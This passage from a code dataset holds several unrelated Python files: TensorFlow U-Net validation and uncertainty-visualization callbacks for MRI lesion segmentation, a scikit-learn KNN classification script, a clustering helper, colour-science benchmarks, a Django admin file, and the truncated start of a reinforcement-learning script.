from data_gen\n \"\"\"\n self.__nb_val_samples = nb_val_samples\n self.__data_gen = data_gen\n self.__thresh = cca_thresh\n self.__batch_size = batch_size\n self.__nb_ex = nb_val_samples * batch_size\n\n def __call__(self, sess, net, epoch, cw):\n loss_sum = 0\n dice_sum = 0\n ppv_sum = 0\n tpr_sum = 0\n x_valid, y_valid = self.__data_gen.get_next()\n for i in range(self.__nb_val_samples):\n x_batch, y_batch = sess.run([x_valid, y_valid])\n mu, loss, dice = sess.run([net.predictor, net.loss, net.dice],\n feed_dict={net.x: x_batch, net.y: y_batch, net.keep_prob: .5,\n net.class_weight: cw})\n for img in range(mu.shape[0]):\n stats = cca_img(mu[img, ..., 0], y_batch[img, ..., 0], self.__thresh)\n ppv_sum += 1 - stats['fdr']['all']\n tpr_sum += stats['tpr']['all']\n\n loss_sum += np.sum(loss)\n dice_sum += np.sum(dice)\n val_stats = {'loss': loss_sum / self.__nb_val_samples, 'dice': dice_sum / self.__nb_val_samples,\n 'ppv': ppv_sum / self.__nb_ex, 'tpr': tpr_sum / self.__nb_ex}\n return val_stats\n\n\nclass Visualizer:\n def __init__(self, data_gen, out_dir, nb_imgs=50):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_imgs:\n \"\"\"\n self.__image_dir = join(out_dir, 'images')\n self.__nb_imgs = nb_imgs\n makedirs(self.__image_dir, exist_ok=True)\n self.__data = None\n self.__imgs = None\n self.__imgs_tru = None\n self.__sidx = None\n self._prep_data(data_gen)\n\n def __call__(self, sess, net, epoch):\n y_prd = []\n for x, y in self.__data:\n y_prd.append(sess.run(net.predictor, feed_dict={net.x: x, net.y: y, net.keep_prob: 1.}))\n y_prd = np.asarray(y_prd)\n\n canvas = self._get_canvas(y_prd)\n # imwrite(join(self.__image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self.__image_dir, \"t2_{:03d}.png\".format(epoch)), canvas[1])\n # imwrite(join(self.__image_dir, \"flair_{:03d}.png\".format(epoch)), canvas[2])\n\n def _prep_data(self, data_gen):\n print(\"preparing validation data... 
\")\n data = []\n xb = []\n yb = []\n for i in range(self.__nb_imgs * 2):\n if i % 20 == 0:\n print(' preparing {}/{}'.format(i // 2, self.__nb_imgs))\n\n x, y = next(data_gen)\n if i % 2 == 0:\n continue\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n\n self.__data = data\n x = np.asarray(xb)\n y = np.asarray(yb)\n\n self.__imgs_tru = 255 * np.repeat(np.expand_dims(_ALPHA * x[:, 0, ...], -1), 3, -1) + \\\n (1 - _ALPHA) * \\\n np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], 3, -1), -1), 3, -1) * [0, 255, 0]\n self.__imgs = x[:, 0, ...] # 50, 192, 192, 64, 3\n self._set_sidx(y)\n\n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self.__sidx = sidx\n\n def _get_canvas(self, y_prd):\n sx, sy, sz, ch = y_prd.shape[2:] # (50, 2, 192, 192, 64, 1)\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self.__imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd[:, 0, ...], 3, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3\n\n out = np.zeros((2 * y_prd.shape[0], sx, sy, 3, 3)) # 50, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[2 * i] = self.__imgs_tru[i, :, :, self.__sidx[i], :, :]\n out[2 * i + 1] = imgs_prd[i, :, :, self.__sidx[i], :, :]\n\n canvas = np.zeros((3, 10 * sx, 10 * sy, 3), dtype='uint8')\n count = 0\n for j in range(10):\n for k in range(10):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n\nclass MIUncertaintyVisualizer:\n def __init__(self, sess, data_gen, out_dir, nb_mc=5, nb_imgs=12, dim=6, nb_ch=4):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_mc\n :param int nb_imgs:\n \"\"\"\n self._image_dir = join(out_dir, 'images')\n self._nb_imgs = nb_imgs\n makedirs(self._image_dir, exist_ok=True)\n self._nb_mc = nb_mc\n self._dim = dim\n self._data = None\n self._imgs = None\n 
self._imgs_tru = None\n self._sidx = None\n self._nb_ch = nb_ch\n self._prep_data(sess, data_gen)\n\n def __call__(self, sess, net, epoch):\n mus = []\n y_dummy = np.empty((1, 192, 192, 64, 1))\n for x in self._x_mc:\n mu = sess.run(net.predictor, feed_dict={net.x: x, net.y: y_dummy, net.keep_prob: .5, net.class_weight: 1})\n mus.append(mu)\n\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n y_prd = np.expand_dims(sigmoid(np.mean(mus_mcs, 0)), -1) # nb_img, 192, 192, 64, 1\n bald = self._bald_uncertainty(sigmoid(mus_mcs))\n y_prd = y_prd[:, 0, ..., 0] # 12, 1, 192, 192, 64, 1, 1\n canvas = self._get_canvas_bald_prd(y_prd, bald)\n\n # imwrite(join(self._image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self._image_dir, \"t2_{:03d}.png\".format(epoch)), canvas[1])\n # imwrite(join(self._image_dir, \"flair_{:03d}.png\".format(epoch)), canvas[2])\n\n @staticmethod\n def _bald_uncertainty(prd):\n # https://arxiv.org/pdf/1703.02910.pdf\n mcs = np.repeat(prd, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, nb_img, 192, 192, 64, 2\n\n entropy = -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n expected_entropy = -np.mean(np.sum(mcs * np.log(mcs + 1e-5), -1), 0)\n bald = entropy - expected_entropy\n return bald\n\n def _prep_data(self, sess, data_gen):\n print(\"preparing validation data... 
\")\n data = []\n xb = []\n yb = []\n i = 0\n x_valid, y_valid = data_gen.get_next()\n while len(yb) < self._nb_imgs:\n if i % 2 == 0:\n i += 1\n continue\n x, y = sess.run([x_valid, y_valid])\n ysum = y[0].sum()\n if ysum < 5:\n continue\n y = np.expand_dims(y[..., 0], -1)\n # remove lesions that are <=2 voxels (because they serve as an unfair comparison)\n y = remove_tiny_les(y)\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n i += 1\n\n print('done')\n self._data = data\n\n x = np.asarray(xb) # nb_im, bs, 192, 192, 64, 3\n y = np.asarray(yb) # nb_im, bs, 192, 192, 64, 1\n\n self._x_mc = np.repeat(np.expand_dims(x[:, 0, ...], 0), self._nb_mc, 0). \\\n reshape((x.shape[0] * self._nb_mc,) + x.shape[2:]) # nb_mc*nb_im, 192, 192, 64, 3\n self._x_mc = np.expand_dims(self._x_mc, 1)\n self._imgs_tru = 255 * np.repeat(np.expand_dims(_ALPHA * x[:, 0, ...], -1), 3, -1) + (1 - _ALPHA) * \\\n np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], self._nb_ch, -1), -1), 3, -1) * [0, 255, 0]\n self._imgs = x[:, 0, ...] 
# 50, 192, 192, 64, 3\n self._set_sidx(y)\n\n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self._sidx = sidx\n\n def _get_canvas_bald_prd(self, y_prd, bald):\n sx, sy, sz, ch = y_prd.shape[1:] # (50, 192, 192, 64, 1)\n dim = self._dim\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self._imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3, 3\n\n bald = np.repeat(np.expand_dims(np.repeat(\n np.expand_dims(bald, -1), self._nb_ch, -1), -1), 3, -1) * [255, 0, 0] # 50, 192, 192, 64, 3\n bald = bald[:, 0]\n out = np.zeros((3 * y_prd.shape[0], sx, sy, self._nb_ch, 3)) # 3*12, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[3 * i] = self._imgs_tru[i, :, :, self._sidx[i], :, :]\n out[3 * i + 1] = imgs_prd[i, :, :, self._sidx[i], :, :]\n out[3 * i + 2] = bald[i, :, :, self._sidx[i], :, :]\n\n canvas = np.zeros((3, dim * sx, dim * sy, 3), dtype='uint8')\n count = 0\n for j in range(dim):\n for k in range(dim):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n\nclass AllUncertaintyVisualizer(MIUncertaintyVisualizer):\n def __call__(self, sess, net, epoch):\n mus = []\n log_vars = []\n for x in self._x_mc:\n mu, log_var = sess.run([net.predictor, net.log_variance], feed_dict={net.x: x, net.keep_prob: .5})\n mus.append(mu)\n log_vars.append(log_var)\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n log_var_mcs = np.asarray(log_vars).reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n\n y_prd = np.expand_dims(sigmoid(np.mean(mus_mcs, 0)), -1)\n bald = self._bald_uncertainty(sigmoid(mus_mcs)) # (nb_img, 1, 192, 192, 64)\n ent = self._entropy(sigmoid(mus_mcs))\n prd_var = self._prd_variance(log_var_mcs)\n prd_unc = 
self._prd_uncertainty(mus_mcs, prd_var)\n\n y_prd = y_prd[:, 0, ..., 0] # 12, 1, 192, 192, 64, 1, 1\n bald_canvas = self._get_bald_canvas(y_prd, bald)\n ent_canvas = self._get_entropy_canvas(y_prd, ent)\n prd_var_canvas = self._get_prd_var_canvas(y_prd, prd_var)\n prd_unc_canvas = self._get_prd_unc_canvas(y_prd, prd_unc)\n\n # imwrite(join(self._image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self._image_dir, \"t2_bald_{:03d}.png\".format(epoch)), bald_canvas[1])\n imwrite(join(self._image_dir, \"t2_ent_{:03d}.png\".format(epoch)), ent_canvas[1])\n imwrite(join(self._image_dir, \"t2_prd_var_{:03d}.png\".format(epoch)), prd_var_canvas[1])\n imwrite(join(self._image_dir, \"t2_prd_unc_{:03d}.png\".format(epoch)), prd_unc_canvas[1])\n\n @staticmethod\n def _entropy(prd_mcs):\n mcs = np.repeat(prd_mcs, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, 50, 192, 192, 64, 2\n return -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n\n @staticmethod\n def _prd_variance(log_var_mcs):\n return np.mean(np.exp(np.clip(log_var_mcs, -7, 7)), 0)[\n 0, ..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n\n @staticmethod\n def _prd_uncertainty(mu_mcs, prd_var):\n # = Var(mu_mcs) + prd_var\n return np.mean(np.square(mu_mcs[..., 0]), 0) - np.square(np.mean(mu_mcs[..., 0], 0)) + prd_var\n\n def _get_bald_canvas(self, y_prd, bald):\n sx, sy, sz, ch = y_prd.shape[1:] # (50, 192, 192, 64, 1)\n dim = self._dim\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self._imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3, 3\n\n bald = np.repeat(np.expand_dims(np.repeat(\n np.expand_dims(bald, -1), self._nb_ch, -1), -1), 3, -1) * [255, 0, 0] # 50, 192, 192, 64, 3\n bald = bald[:, 0]\n out = np.zeros((3 * y_prd.shape[0], sx, sy, self._nb_ch, 3)) # 3*12, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[3 * i] = self._imgs_tru[i, :, :, 
self._sidx[i], :, :]\n out[3 * i + 1] = imgs_prd[i, :, :, self._sidx[i], :, :]\n out[3 * i + 2] = bald[i, :, :, self._sidx[i], :, :]\n\n canvas = np.zeros((self._nb_ch, dim * sx, dim * sy, 3), dtype='uint8')\n count = 0\n for j in range(dim):\n for k in range(dim):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n def _get_entropy_canvas(self, y_prd, ent):\n return self._get_bald_canvas(y_prd, ent)\n\n def _get_prd_var_canvas(self, y_prd, prd_var):\n return self._get_bald_canvas(y_prd, prd_var)\n\n def _get_prd_unc_canvas(self, y_prd, prd_unc):\n return self._get_bald_canvas(y_prd, prd_unc)\n\n\nclass UncertaintyVisualizerDebug:\n def __init__(self, sess, data_gen, out_dir, nb_mc=5, nb_imgs=20, nb_ch=4):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_mc\n :param int nb_imgs:\n \"\"\"\n self._image_dir = join(out_dir, 'images')\n self._nb_imgs = nb_imgs\n makedirs(self._image_dir, exist_ok=True)\n self._nb_mc = nb_mc\n self._data = None\n self._imgs = None\n self._imgs_tru = None\n self._imgs_tru_red = None\n self._imgs_tru_gr = None\n self._sidx = None\n self._nb_ch = nb_ch\n self._prep_data(sess, data_gen)\n self._save_gt_imgs()\n\n def __call__(self, sess, net, epoch):\n mus = []\n log_vars = []\n y_dummy = np.empty((1, 192, 192, 64, 1))\n for x in self._x_mc:\n mu, log_var = sess.run([net.predictor, net.log_variance], feed_dict={net.x: x, net.y: y_dummy, net.keep_prob: .5, net.class_weight: 1})\n mus.append(mu)\n log_vars.append(log_var)\n\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n log_var_mcs = np.asarray(log_vars).reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n y_prd = sigmoid(np.mean(mus_mcs, 0)) # nb_img, 192, 192, 64, 1\n bald = self._bald_uncertainty(sigmoid(mus_mcs))\n ent = self._entropy(sigmoid(mus_mcs))\n prd_var = self._prd_variance(log_var_mcs)\n var_mcs = 
self._var_mcs(sigmoid(mus_mcs))\n y_prd = y_prd[:, 0, ...] # 12, 1, 192, 192, 64, 1, 1 --> 12, 192, 192, 64, 1, 1\n \n y_prd[y_prd>=0.5] = 1\n y_prd[y_prd<0.5] = 0\n y_prd = y_prd.astype(np.int16)\n \n y_paint = []\n for i, prd in enumerate(y_prd):\n a = prd[..., 0]\n b = self._y[i,0,...,0]\n y_paint.append(ohe(paint_cca_img(a, b)))\n y_paint = np.asarray(y_paint)\n \n imgs_prd = np.repeat(np.expand_dims(self._imgs, -1), 3, -1)\n labels = np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1)\n labels = imgs_prd.max() * labels\n imgs_prd[labels!=0]=0\n labels = [1,0,0]*labels\n imgs_prd[labels!=0] = labels[labels!=0] # 12, 192, 192, 64, 4, 3\n imgs_prd = np.flip(imgs_prd.transpose(0,4,2,1,3,5),2)\n \n imgs_prd_paint = np.repeat(np.expand_dims(self._imgs, -1), 3, -1)\n y_paint = np.repeat(np.expand_dims(y_paint,-2),self._nb_ch,-2) \n labels_paint = imgs_prd.max() * y_paint\n imgs_prd_paint[labels_paint.sum(-1) != 0] = 0\n imgs_prd_paint[labels_paint!=0] = labels_paint[labels_paint!=0]\n imgs_prd_paint = np.flip(imgs_prd_paint.transpose(0,4,2,1,3,5),2)\n \n bald = self._unc_canvas(bald)\n ent = self._unc_canvas(ent)\n prd_var = self._unc_canvas(prd_var)\n var_mcs = self._unc_canvas(var_mcs)\n\n for i, (iprd,iprd_paint) in enumerate(zip(imgs_prd, imgs_prd_paint)):\n imwrite(join(self._image_dir,str(i), \"{}_t1_{:03d}.png\".format(i,epoch)), iprd[0,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_t2_{:03d}.png\".format(i,epoch)), iprd[1,:,:,self._sidx[i]], )\n imwrite(join(self._image_dir,str(i), \"{}_flr_{:03d}.png\".format(i,epoch)), iprd[2,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i), \"{}_pdw_{:03d}.png\".format(i,epoch)), iprd[3,:,:,self._sidx[i]])\n\n imwrite(join(self._image_dir,str(i), \"{}_t1_paint_{:03d}.png\".format(i,epoch)), iprd_paint[0,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_t2_paint_{:03d}.png\".format(i,epoch)), iprd_paint[1,:,:,self._sidx[i]], )\n imwrite(join(self._image_dir,str(i), 
\"{}_flr_paint_{:03d}.png\".format(i,epoch)), iprd_paint[2,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i), \"{}_pdw_paint_{:03d}.png\".format(i,epoch)), iprd_paint[3,:,:,self._sidx[i]])\n \n imwrite(join(self._image_dir,str(i),\"{}_mi_{:03d}.png\".format(i,epoch)), bald[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_ent_{:03d}.png\".format(i,epoch)), ent[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_prdvar_{:03d}.png\".format(i,epoch)), prd_var[i,:,:,self._sidx[i]])\n imwrite(join(self._image_dir,str(i),\"{}_varmcs_{:03d}.png\".format(i,epoch)), var_mcs[i,:,:,self._sidx[i]])\n\n @staticmethod\n def _unc_canvas(x):\n x = x[:,0]\n x = np.repeat(np.expand_dims(x, -1),3,-1) # 12, 192, 192, 64,3\n x = [1,0,0] * np.flip(x.transpose(0,2,1,3,4),1)\n return x\n \n @staticmethod\n def _bald_uncertainty(prd):\n # https://arxiv.org/pdf/1703.02910.pdf\n mcs = np.repeat(prd, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, nb_img, 192, 192, 64, 2\n\n entropy = -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n expected_entropy = -np.mean(np.sum(mcs * np.log(mcs + 1e-5), -1), 0)\n bald = entropy - expected_entropy\n return bald\n\n @staticmethod\n def _entropy(prd_mcs):\n mcs = np.repeat(prd_mcs, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, 50, 192, 192, 64, 2\n return -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n\n @staticmethod\n def _prd_variance(log_var_mcs):\n return np.mean(np.exp(np.clip(log_var_mcs, -7, 7)), 0)[0, ..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n \n @staticmethod\n def _var_mcs(prd_mcs):\n return np.var(prd_mcs, 0)[..., 0] # (nb_mc, nb_img, 192, 192, 64, 1) --> (nb_img, 192, 192, 64, 1)\n\n def _prep_data(self, sess, data_gen):\n print(\"preparing validation data... 
\")\n data = []\n xb = []\n yb = []\n i = 0\n x_valid, y_valid = data_gen.get_next()\n while len(yb) < self._nb_imgs:\n x, y = sess.run([x_valid, y_valid])\n ysum = y[0].sum()\n if ysum < 5:\n continue\n y = np.expand_dims(y[..., 0], -1)\n # remove lesions that are <=2 voxels (because they serve as an unfair comparison)\n y = remove_tiny_les(y)\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n i += 1\n\n print('done')\n self._data = data\n\n x = np.asarray(xb) # nb_im, bs, 192, 192, 64, 4\n print('x.shape', x.shape)\n y = np.asarray(yb) # nb_im, bs, 192, 192, 64, 1\n self._y = y.astype(np.int16)\n\n self._x_mc = np.repeat(np.expand_dims(x[:, 0, ...], 0), self._nb_mc, 0). \\\n reshape((x.shape[0] * self._nb_mc,) + x.shape[2:]) # nb_mc*nb_im, 192, 192, 64, 3\n self._x_mc = np.expand_dims(self._x_mc, 1)\n \n self._imgs_tru = np.repeat(np.expand_dims(x[:, 0, ...], -1), 3, -1)\n self._imgs_raw = self._imgs_tru.copy()\n labels = self._imgs_tru.max() * np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], self._nb_ch, -1), -1), 3, -1)\n self._imgs_tru[labels!=0]=0\n labels_red = [1,0,0]*labels\n labels_gr = [0,1,0]*labels\n self._imgs_tru_red = np.copy(self._imgs_tru)\n self._imgs_tru_gr = np.copy(self._imgs_tru)\n self._imgs_tru_red[labels_red!=0] = labels_red[labels_red!=0]\n self._imgs_tru_gr[labels_gr!=0] = labels_gr[labels_gr!=0]\n self._imgs = x[:, 0, ...] 
# 50, 192, 192, 64, 3\n self._set_sidx(y)\n \n def _save_gt_imgs(self):\n print('saving ground truth images...')\n for i, img_tru_red in enumerate(self._imgs_tru_red):\n makedirs(join(self._image_dir,str(i)), exist_ok=True)\n gr = np.flip(np.transpose(self._imgs_tru_gr[i,:,:,self._sidx[i]],(2,1,0,3)),1)\n red = np.flip(np.transpose(img_tru_red[:,:,self._sidx[i]],(2,1,0,3)),1)\n raw = np.flip(np.transpose(self._imgs_raw[i,:,:,self._sidx[i]],(2,1,0,3)),1)\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_red.png\".format(i)), red[0])\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_gr.png\".format(i)), gr[0])\n imwrite(join(self._image_dir, str(i), \"{}_t1_0gt_raw.png\".format(i)), raw[0])\n \n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_red.png\".format(i)), red[1])\n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_gr.png\".format(i)), gr[1])\n imwrite(join(self._image_dir, str(i), \"{}_t2_0gt_raw.png\".format(i)), raw[1])\n \n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_red.png\".format(i)), red[2])\n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_gr.png\".format(i)), gr[2])\n imwrite(join(self._image_dir, str(i), \"{}_flr_0gt_raw.png\".format(i)), raw[2])\n \n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_red.png\".format(i)), red[3])\n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_gr.png\".format(i)), gr[3])\n imwrite(join(self._image_dir, str(i), \"{}_pdw_0gt_raw.png\".format(i)), raw[3])\n print('done')\n \n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self._sidx = sidx\n","sub_path":"tf_unet/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":25810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416006167","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 19:03:34 2019\n\n@author: vdunga\n\"\"\"\n#importing 
libraries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as mp\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\n\n\n\n\n\n#importing DATASET\nDATASET = pd.read_csv('Social_Network_Ads.csv')\nXS = DATASET.iloc[:, 2:4].values\nY = DATASET.iloc[:, 4].values\n#l=XS[Y == 0, 0]\n\n#Y=Y.reshape(400,1)\n#feature scaling\n\nX_SC = StandardScaler()\n#Y_Sc=StandardScaler()\nX = X_SC.fit_transform(XS)\n#Y=Y_Sc.fit_transform(Y)\n\n#splitting DATASET into TRAIN and TEST sets\n\n\nX_TRAIN, X_TEST, Y_TRAIN, Y_TEST = train_test_split(X, Y, test_size=1/4, random_state=0)\n#Y_TRAIN1=Y_TRAIN.ravel().T\n\n#fitting logistic regression CLASSIFIER to DATASET\n\nCLASSIFIER = KNeighborsClassifier()\nCLASSIFIER.fit(X_TRAIN, Y_TRAIN)\n\n#predicting values\n\nY_PRED = CLASSIFIER.predict(X_TEST)\n\n#Making confusion matrix to know count of correct predictions\n\nCM = confusion_matrix(Y_TEST, Y_PRED)\n\n#visualizing the predictions vs actual\n\nX_SET, Y_SET = X_TRAIN, Y_TRAIN\n'''xx,yy=np.meshgrid(XS[:,0],XS[:,1])\nxx=xx*1000\nmp.contourf(xx,yy,yy,cmap = ListedColormap(('red', 'green','blue')))'''\nX1, X2 = np.meshgrid(np.arange(start=min(X_SET[:, 0])-1, stop=max(X_SET[:, 0])+1, step=0.01),\n np.arange(start=min(X_SET[:, 1])-1, stop=max(X_SET[:, 1])+1, step=0.01))\nmp.xlim(X1.min(), X1.max())\nmp.ylim(X2.min(), X2.max())\nmp.contourf(X1, X2, CLASSIFIER.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha=0.75, cmap=ListedColormap(('red', 'green')))\nfor i, j in enumerate(np.unique(Y_SET)):\n mp.scatter(X_SET[Y_SET == j, 0], X_SET[Y_SET == j, 1],\n c=ListedColormap(('red', 'green'))(i), label=j)\nmp.title('Logistic Regression (TEST set)')\nmp.xlabel('Age')\nmp.ylabel('Estimated 
Salary')\nmp.legend()\nmp.show()\n\n'''print(list(enumerate(np.unique(Y_SET))))\na=np.array([X1.ravel(),X2.ravel()]).T\nr=X1.shape\nv = np.arange(1, 10)\nw = v.reshape(-1, 1)'''\n","sub_path":"Machine Learning A-Z Template Folder/Part 3 - Classification/Section 14 - Logistic Regression/Logistic_Regression/logreg.py","file_name":"logreg.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84839660","text":"import coordinate_based as cb\n\ndef create_clusters(locations, number_of_clusters=1):\n if number_of_clusters > 1:\n # each pair is 1 cluster\n clusters = []\n # clusters.append([(start_point, None)])\n for pair in locations:\n clusters.append([pair])\n\n while len(clusters) > number_of_clusters:\n # find closest clusters and merge\n min_cluster_distance = float('inf')\n min_cluster_index1 = -1\n min_cluster_index2 = -1\n for i in range(len(clusters) - 1):\n for j in range(i+1, len(clusters)):\n dist = cb.calculate_distance(clusters[i], clusters[j])\n if dist < min_cluster_distance:\n min_cluster_distance = dist\n min_cluster_index1 = i\n min_cluster_index2 = j\n # merge clusters\n clusters[min_cluster_index1].extend(clusters.pop(min_cluster_index2))\n\n # points merged, clusters formed\n print(\"found clusters: \", clusters)\n return clusters\n else:\n return [locations]\n\n\nif __name__ == '__main__':\n locs = [((58.384292, 26.722858), (58.398912, 26.713159)), ((58.378937, 26.67651), (58.36845, 26.708868)),\n ((58.384292, 26.722858), (58.394291, 26.712848))]\n result1 = create_clusters(locs, 1)\n result2 = create_clusters(locs, 2)\n result3 = create_clusters(locs, 3)","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407036644","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"colour.models\" sub-package 
Benchmarks\n======================================\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport colour\n\nfrom benchmarks.factories.ijk import IJK_benchmark_factory\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2019-2021 - Colour Developers'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-developers@colour-science.org'\n__status__ = 'Production'\n\n__all__ = ['YcbcrFactories']\n\nYcbcrFactories = {\n 'RGB_to_YcCbcCrc': colour.models.RGB_to_YcCbcCrc,\n 'RGB_to_YCbCr': colour.models.RGB_to_YCbCr,\n 'YcCbcCrc_to_RGB': colour.models.YcCbcCrc_to_RGB,\n 'YCbCr_to_RGB': colour.models.YCbCr_to_RGB,\n}\n\nIJK_benchmark_factory(YcbcrFactories, __name__)\n","sub_path":"benchmarks/colour/rgb/ycbcr.py","file_name":"ycbcr.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650519683","text":"from django.contrib import admin\nfrom mainapp.models import Product, ProductType\n# Register your models here.\n@admin.register(Product)\nclass PostAdmin(admin.ModelAdmin):\n list_display = ('product_id', 'product_name', 'product_type')\n\n ordering = ('product_id', 'product_type')\n\n\nadmin.site.register(ProductType)\n","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519791623","text":"\"\"\" Jeonggwan Lee(leejk526@kaist.ac.kr)\n\"\"\"\nimport pickle\nimport ipdb\nimport gym\nimport numpy as np\nimport copy\nimport os\nimport tensorflow as tf\nimport random\n\nfrom record import get_test_record_title\nimport tf_utils\n\nTRANSITION = 15000\n#EPISODE = 20\n#MEMORY_SIZE = TRANSITION + 1000\nNUM_ACTION_ITER = 10000\nNUM_EVALUATION = 100\nNUM_EPISODES = 300\nMAX_STEPS = 300\nEPOCH_SIZE = 100\nBATCH_SIZE = 
